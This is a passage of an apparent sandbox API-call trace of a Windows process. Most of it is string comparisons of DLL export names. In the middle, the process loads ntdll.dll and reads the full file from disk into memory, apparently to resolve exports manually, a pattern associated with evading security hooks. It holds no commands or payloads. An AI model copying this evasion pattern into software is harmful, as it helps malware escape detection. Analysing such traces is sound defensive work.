(lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0189.836] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0189.836] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0189.836] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0189.836] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0189.836] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0189.836] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0189.836] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0189.836] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0189.836] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0189.836] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0189.836] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0189.836] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0189.836] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0189.854] GetProcessHeap () returned 0x4a0000 [0189.856] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x411c040 | out: hHeap=0x4a0000) returned 1 [0189.864] GetProcessHeap () returned 0x4a0000 [0189.864] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b90c0 [0189.864] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0189.865] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0189.865] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0189.865] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0189.865] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0189.866] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0189.866] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0189.866] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0189.866] GetProcessHeap () returned 0x4a0000 [0189.866] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1bba48) returned 0x4116040 [0189.870] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0190.071] ReadFile (in: hFile=0x140, lpBuffer=0x4116040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4116040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0190.102] CloseHandle (hObject=0x140) returned 1 [0190.102] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0190.102] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0190.102] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0190.102] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0190.102] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0190.103] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0190.103] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0190.103] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0190.103] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0190.103] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0190.103] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0190.103] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0190.103] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0190.103] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.103] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0190.103] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0190.103] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0190.103] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0190.103] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.103] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.103] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0190.103] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0190.103] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0190.103] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0190.104] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.104] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.104] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.104] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0190.104] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0190.104] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0190.104] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0190.104] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.104] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.104] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.104] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.104] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0190.104] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0190.104] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0190.104] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0190.104] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0190.105] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0190.105] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0190.105] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0190.105] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0190.105] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0190.105] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0190.105] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.105] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.106] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.106] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.106] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0190.106] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0190.106] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0190.106] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0190.106] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0190.106] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0190.106] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0190.106] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0190.106] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.106] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.106] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.106] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.106] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0190.106] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0190.106] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0190.106] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0190.106] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0190.106] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0190.106] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0190.106] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0190.106] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0190.106] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.106] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.106] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.106] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.106] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0190.106] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0190.106] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0190.106] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0190.106] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0190.106] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0190.106] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0190.107] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0190.108] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0190.108] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0190.108] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0190.108] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0190.108] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.364] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.364] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.364] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.364] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0190.364] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0190.364] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0190.364] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0190.364] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0190.364] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0190.364] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0190.365] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0190.365] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0190.365] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0190.365] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0190.366] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.366] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.366] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.366] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.366] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0190.366] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0190.366] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0190.366] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0190.367] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0190.367] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0190.367] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0190.367] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0190.367] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0190.368] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0190.368] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0190.368] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0190.368] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0190.368] lstrcmpA 